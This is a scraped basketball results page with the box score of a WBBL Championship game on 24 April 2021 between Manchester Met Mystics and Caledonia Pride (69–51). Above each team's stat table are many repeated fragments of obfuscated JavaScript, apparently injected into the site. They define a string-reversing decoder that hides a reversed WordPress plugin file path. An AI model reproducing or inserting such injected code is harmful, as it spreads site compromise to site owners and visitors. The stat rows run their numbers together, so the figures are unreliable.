Breaking news
  1. Highlights & Pictures
  2. Highlights: Queens v Pride
  3. Highlights & Pictures: Pride v Riders
  4. Highlights: Wolves v Pride
  5. Highlights & Pictures: Pride v Wolves
WBBL Championship 24th April 2021 - 2:00 pm

Recap

Details

Date Time League Season Full Time
24th April 2021 2:00 pm WBBL Championship 2020/21 40'

Results

Team1234T
Manchester Met Mystics2219161269
Caledonia Pride146181351

Manchester Met Mystics

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
45Helen Naylor-251331081747.12366.77887.5491
8Georgia Jones-16053051827.81616.75771.4001
3Nicolette Fong Lyew Quee-643403837.5030.0000223
0Rosie Hynes-621102633.3010.02366.7020
24Sofia Song-621002825.02540.0000021
10Rheanne Bailey-430102633.3030.0000122
20Dominique Allen-2322111100.0000000032
9Hannah Shaw-260101714.3000000422
13Vanessa Akra-2100101333.3000000552
25Charli Wroe-00000010.0000000000
23Jade Mbam-03000020.0010.0000030
32Natalie Feurtado-01000000000020.0010
 Total 694715141257732.552222.7142070.01631014

Caledonia Pride

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
20Private: Pollyanna StorieForward1560015771.42366.73475.0062
4Maud RangerGuard111321031816.731030.022100.01120
5Sian PhillipsForward111610131618.80005862.5974
19Private: Ella DohertyGuard7520031323.11333.3000322
25Elise TweedieCenter440102633.3000000310
8Taryn CumminsGuard2000011100.0000000000
50Eabha KerrForward17100050.00001425.0434
6Rose HarveyGuard01400010.0010.0000013
22Sophie LoughranForward02000000000000201
 Total 51541022176725.461735.3111861.12232016